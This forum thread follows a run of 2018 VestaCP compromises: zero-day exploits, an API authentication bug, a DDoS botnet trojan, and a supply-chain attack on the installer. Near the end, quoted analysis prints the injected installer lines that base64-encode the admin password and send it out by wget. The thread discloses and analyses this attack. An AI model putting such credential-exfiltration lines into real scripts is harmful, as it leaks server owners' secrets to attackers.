Security Ouch VestaCP servers hacked !

Revenge · Apr 11, 2018

Their site is working for me.

eva2000 · Apr 11, 2018

Revenge said: ↑

Their site is working for me.
Click to expand...

Forum just came back for me now

hmmm Got 10 VestaCP servers exploited - Page 44 - Vesta Control Panel - Forum

Yesterday I installed 0.9.8-20 on a fresh vultr centos 7.4 everything was fine the whole day until I ran yum update today, centos and vesta had updates so I accepted them and then the server was infected. Now I am afraid to run yum update after installing vesta. So I guess 0.9.8-20 is affected as well.

You can try this yourself, I don't know why yum update had vesta updates when I was already running version 0.9.8-20
Click to expand...

fresh install and still infected ?

Revenge · Apr 11, 2018

eva2000 said: ↑

Forum just came back for me now

hmmm Got 10 VestaCP servers exploited - Page 44 - Vesta Control Panel - Forum

fresh install and still infected ?
Click to expand...

Misinformation i bet. He was not infected and right after update he got it?

People that were infected, cleaned the Trojan and updated, are not complaining about a new infection.

eva2000 · Apr 12, 2018

well not good news from Patrick Williams a well known security person from Rack911. Well good in that VestaCP devs now have a chance to patch these up.

VestaCP zero-day exploit | Web Hosting Talk

VestaCP is pretty bad.

I been hacking on it for the last hour... many vulnerabilities, lol. I will send the details off later to the developers...
Click to expand...

VestaCP hit with zeroday exploit [Patch Released, Unclear If Resolved] - Page 4

Wow, VestaCP is so bad. I mean, so, so, so bad.

I have already found several root level exploits in LITERALLY less than 15 minutes and I'm typing with one hand while I eat with the other lol.

I'm making a list of everything, I'll send off to their developers at some point...
Click to expand...

Revenge · Apr 13, 2018

In VestaCP forum, many people were saying something related to roundcube, that it seemed the exploit was from there.
VestaCP installs Roundcube.

Coincidence or not, yesterday Roudcube released a security update for an injection vulnerability:

Security update 1.3.6 released
11 April 2018
We just published a security update to the stable version 1.3. It primarily fixes a recently discovered IMAP command injection vulnerability caused by insufficient input validation within the archive plugin. Details about the vulnerability are published under CVE-2018-9846.

Additionally, we back-ported some minor fixes from the master branch which improve PHP 7.2 compatibility as well as PGP signing and key handling for those who use the Enigma plugin.

See the full changelog in the release notes on the Github download page.

We strongly recommend to update all productive installations of Roundcube with this new version. Updates for older LTS versions will follow soon.
Click to expand...

eva2000 · Apr 13, 2018

From that news and Patrick's i think there's multiple root level exploits in VestaCP so a multi vector attack is probably most likely - all leading to compromise. Will be interesting to see what is revealed vulnerability wise after VestaCP patches everything.

eva2000 · Apr 14, 2018

Patrick's VestaCP security vulnerability report is being sent to VesatCP folks today VestaCP hit with zeroday exploit [Patch Released, Unclear If Resolved] - Page 5

a bit of a clue as to where some of the vulnerabilities are

Lol. I hope to send off a report today. It's so bad.

I sure hope no one has untrusted users on their VestaCP boxes.
Click to expand...

Revenge · Apr 14, 2018

Sent off 6 security vulnerabilities to [email protected] with 3 of those leading to a easy root compromise. The other 3 are still very serious flaws, password / hash disclosures, etc.

I'll send off more once they fix those.
Click to expand...

eva2000 · Apr 14, 2018

Yup VestaCP hit with zeroday exploit [Patch Released, Unclear If Resolved] - Page 5

edit: just re-read that last line

I'll send off more once they fix those.
Click to expand...

so there's more to come !

robert syputa · Apr 15, 2018

Thanks - great heads up. You bring out the strength of sharing.

Revenge · Apr 16, 2018

eva2000 said: ↑

Yup VestaCP hit with zeroday exploit [Patch Released, Unclear If Resolved] - Page 5

edit: just re-read that last line

so there's more to come !
Click to expand...

@eva2000 are you registered in lowendtalk? Im not and they ask for review.

I posted what patrick said in Vesta forum and i received one PM from one of their Dev's with:

Hi, I'm Predrag from Vesta dev team (dpeca on github)

I saw your post that Patrick from Rack911 Labs sent 6 security vulnerabilities to [email protected]

Serghey is unresponsive to me, in last few days... I didn't get from him any information about issues that Patrick found.
He could be on vacation, I'm not sure.

Maybe he didn't respond to Patrick.

If Serghey don't respond to Patrick in next few days, you can say to Patrick that he can send found vulnerabilities to [email protected] - that is our mailing list of few very close team developers, we will fix issues as soon as it's possible.
Click to expand...

Can you pass this message to Patrick?

eva2000 · Apr 16, 2018

Revenge said: ↑

Can you pass this message to Patrick?
Click to expand...

Just passed it on to Patrick/SecNinja on LET

eva2000 · Jun 27, 2018

@Revenge looks like VestaCP hacked again ?

VestaCP again hacked. UPDATE IMMEDIATELY! ?

As many of you must be running Vesta control panel, I just wanted to warn you all that servers running it are getting hijacked. We have already updated our servers and checked also if they have been hijacked. Last time, Vesta servers were participating a botnet and 4 of our servers were responsible for a huge downtime/network disruption at Contabo according to their team xD. If you are noticing sudden slow response on your server, this could be the source. This tutorial can be followed to fix it Unix Trojan.DDoS_XOR-1, Chinese Chicken Multiplatform DoS botnets Trojan - Server Security & Hardening - Admin-Ahead Community
Click to expand...

Seems VestaCP has updated to fix the security issue though 0.9.8-22 (security) - Vesta Control Panel - Forum

believe same ones at

[CLOSED] [Urgent!] Critical Security issue in VestaCP - Vesta Control Panel - Forum

have been HACKED ! by xaxaxa.eu - Vesta Control Panel - Forum

ouch according to VestaCP again hacked. UPDATE IMMEDIATELY!

while trying to add a fix to the authentication stuff that's happening before api access back in april, they missed/forgot an 'else' ... rendering the whole auth check useless if user and hash was omitted in the post request. free api for everyone...

in addition to this there is another security hole in one of the cli scripts which was then used to execute code on the system itself. add that to the ability to access the api and you're good to go.

so far the impact this time seems to be low, afaik only one user reported that he had a miner deployed in tmp and running.

but from what I have seen the last fix only patches that api problem and not the issue in the cli script that has been used.

those patches get deployed on the servers automatically at night, so at least this api problem should be solved for now. other holes - not so much.
Click to expand...

Revenge · Jun 27, 2018

Yep, it seems. I also noticed now the .21 update was the one that fixed the 6 securities issues the other guy discovered.

eva2000 · Jun 27, 2018

Revenge said: ↑

Yep, it seems. I also noticed now the .21 update was the one that fixed the 6 securities issues the other guy discovered.
Click to expand...

Yeah supposedly fixed IIRC. I updated my VestaCP install from LEMP comparison testing as well to .22.

looks like the v-list-sys-vesta-update script doesn't like being run via full path as opposed to within the script's directory
Code (Text):
/usr/local/vesta/bin/v-list-sys-vesta-updates
/usr/local/vesta/bin/v-list-sys-vesta-updates: line 16: /func/main.sh: No such file or directory
/usr/local/vesta/bin/v-list-sys-vesta-updates: line 17: /conf/vesta.conf: No such file or directory
PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-24
vesta-php    0.9.8  21   amd64  yes   2018-06-10
vesta-nginx  0.9.8  21   amd64  yes   2018-06-10
some web hosts reported their customer's VestaCP installs has been affected by this security issue [Security fix] Running VestaCP? Make sure to update! | Web Hosting Talk

eva2000 · Sep 26, 2018

@Revenge did VestaCP get hacked again Vestacp got hacked/vulnerable ?

Secure your servers before is too late, more about:

All VestaCP installations being attacked - Vesta Control Panel - Forum

Cheers.
Click to expand...

I can't load their forums now as malware bytes is blocking their domain

Riskware, or “risky software,” describes legitimate software programs that contain loopholes or vulnerabilities that can be exploited by hackers for malicious purposes.
Click to expand...

eva2000 · Oct 18, 2018

Heads up to anyone using VestaCP or migrated data from VestaCP to Centmin Mod, that their initial VestaCP installs might have been compromised and if they were you could of migrated compromised data from VestaCP to Centmin Mod. Seems From May 31 to June 13, VestaCP Ubuntu installer was sending admin passwords back to VestaCP.com servers and were done so in clear plain text unencrypted too. Apparently, VestaCP.com servers were hacked.

All VestaCP installations being attacked - Page 17 - Vesta Control Panel - Forum

All VestaCP installations being attacked - Page 18 - Vesta Control Panel - Forum

All VestaCP installations being attacked - Page 19 - Vesta Control Panel - Forum

Leak was introduced here:
https://github.com/serghey-rodin/vesta/ ... 5c0b99518f
Leak was removed here:
https://github.com/serghey-rodin/vesta/ ... ef0f8ee35b

From 31 May to 13 June Ubuntu installer was leaking admin passwords..

Well, explanaition from Vesta team is required.
Click to expand...
I found the debian installer script to differ in one line! The script that I used to install the server with login attempts has one additional line (809) like
Code:
codename="$codename:$(echo $vpass:$servername | base64)"
which is not in the older version. as we can see this adds the servername and admin password ($vpass) encoded as base64 string to a variable named codename. so I looked up what is done with that var in the process and found this
Code:
# Sending install notification to vestacp.com
wget vestacp.com/notify/?$codename -O /dev/null -q
so obviously the servername and password are send via GET request to some kind of script under vestacp.com ???

what is that for and where or why are the passwords of vesta installations sent to? are they getting stored somehow or is this not intentional?
if the initial password that get's set during the installation is send out to whomever I think it's no surprise that they got leaked or lost or this even is again a hack on the source files of vesta...

however, I downloded the original installer again and the specific line is not in it anymore - which makes me guess, that the devs already know about it?

anyone care to clarify?
Click to expand...
from All VestaCP installations being attacked - Page 19 - Vesta Control Panel - Forum

I'm sorry about inactivity in this post from our side. It was a complex issue and we were not sure we understand the whole picture. Leak in the installer is just one piece of the puzzle. All pieces together lead to cumulative effect.

The issue number one
Our infrastructure server was hacked. Presumably using API bug in the release 0.9.8-20. The hackers then changed all installation scripts to log admin password and ip as addition to the distro name we used to collect stats.

Please check if your server IP here
>>>>> http://vestacp.com/test/?ip=127.0.0.1 <<<<<

If it's there you should change admin passwords as soon as possible. Also please make sure there is no /usr/bin/dhcprenew binary installed on your server. This binary is some sort of trojan that is able to launch remote DDoS attack or open shell to your server
Click to expand...

The issue number two
However the first issue didn't explain few affected servers. Luckily security experts from https://arcturussecurity.com helped us to uncover another security vulnerability.

The new release will be available in next few hours.
I will keep you posted
Click to expand...

Revenge · Oct 20, 2018

Open source web hosting software compromised with DDoS malware | ZDNet

eva2000 · Oct 20, 2018

Revenge said: ↑

Open source web hosting software compromised with DDoS malware | ZDNet
Click to expand...

"Our infrastructure server was hacked," said a member of the Vesta Control Panel (VestaCP) team yesterday in a forum post. "The hackers then changed all installation scripts to log admin password and [server IP]."

A user who analyzed the VestaCP source code on its official GitHub repository said the malicious code was added on May 31, this year, and later removed two weeks later, on June 13.

The code permitted attackers to collect admin passwords for servers where the Vesta control panel was installed. To avoid making the traffic from compromised servers look suspicious, the attackers sent passwords back to an official VestaCP domain that they presumably still had control over.

Attackers then used these passwords to access compromised servers and install a new malware strain named Linux/ChachaDDoS --broken down in this ESET report released today.
Click to expand...

hmm does that mean their Github account was hacked/compromised or the computer that pushed code to Github account was hacked I wonder ? Sounds like they compromised the vestacp.com domain hosted server(s) too then. Probably all stemmed from their vestacp.com hosted servers all running vestacp would itself got hacked/compromised and it snowballed from there!. That's ALOT of compromising all round!

Though VestaCP saying otherwise

But despite its efforts, VestaCP also appears to have suffered some irreparable reputational damage, as some users simply didn't believe the company's explanation that a hacker broke into its infrastructure. Many users blamed the issue on Vesta itself, and some migrated their servers from VestaCP to a project fork managed by a Belgian company.
Click to expand...

Sounds like VestaCP should always force end users to change admin password/credentials on first log in and not rely on the generated logins created by VestaCP. Though that can open up end users choosing even less secure/weak login passwords than the auto generated ones.

Incidents like these always prompt me to think about Centmin Mod's own security - so more ideas for stuff to implement myself

eva2000 · Oct 20, 2018

More details at VestaCP compromised in a new supply-chain attack

In recent months, numerous users of VestaCP, a hosting control panel solution, have received warnings from their service providers that their servers were using an abnormal amount of bandwidth. We know now that these servers were in fact used to launch DDoS attacks. Analysis of a compromised server has shown that malware we call Linux/ChachaDDoS was installed on the system. At the same time this week, we found out that the official VestaCP distribution was compromised, resulting in a supply-chain attack on new installations of VestaCP since at least May 2018. Linux/ChachaDDoS has some similarity to Linux/Xor.DDoS (aka Xor.DDOS), but unlike this older family, it has multiple stages and uses Lua for its second- and third-stage components.
Click to expand...

As “L4ky” pointed out, it is all in the Git history of the vst-install-ubuntu.sh file. From May 31 18:15:53 2018 (UTC+3) (a3f0fa1) to Jun 13 17:08:36 2018 (ee03eff) the $codename variable contained the base64-encoded password and server domain name sent to http://vestacp.com/notify/. Falzo says he found the hack in line 809 of the Debian installer, but unlike for the Ubuntu installer, we couldn’t find a reference to it in the Git history. Perhaps the installer on VestaCP differed from what is visible on Github?

Given this major password leak, we urge all VestaCP administrators to change the admin password and harden access to their servers. Serious admins should consider an audit of the VestaCP code.
Click to expand...

Log in / Register

Forums

Get the most out of your Centmin Mod LEMP stack

Security Ouch VestaCP servers hacked !

Revenge Active Member

eva2000 Administrator Staff Member

Revenge Active Member

eva2000 Administrator Staff Member

Revenge Active Member

eva2000 Administrator Staff Member

eva2000 Administrator Staff Member

Revenge Active Member

eva2000 Administrator Staff Member

robert syputa Member

Revenge Active Member

eva2000 Administrator Staff Member

eva2000 Administrator Staff Member

Revenge Active Member

eva2000 Administrator Staff Member

eva2000 Administrator Staff Member

eva2000 Administrator Staff Member

Revenge Active Member

eva2000 Administrator Staff Member

eva2000 Administrator Staff Member

.

Log in / Register

Useful Searches

Get the most out of your Centmin Mod LEMP stack

Security Ouch VestaCP servers hacked !

Revenge Active Member

eva2000 Administrator Staff Member

Revenge Active Member

eva2000 Administrator Staff Member

Revenge Active Member

eva2000 Administrator Staff Member

eva2000 Administrator Staff Member

Revenge Active Member

eva2000 Administrator Staff Member

robert syputa Member

Revenge Active Member

eva2000 Administrator Staff Member

eva2000 Administrator Staff Member

Revenge Active Member

eva2000 Administrator Staff Member

eva2000 Administrator Staff Member

eva2000 Administrator Staff Member

Revenge Active Member

eva2000 Administrator Staff Member

eva2000 Administrator Staff Member

.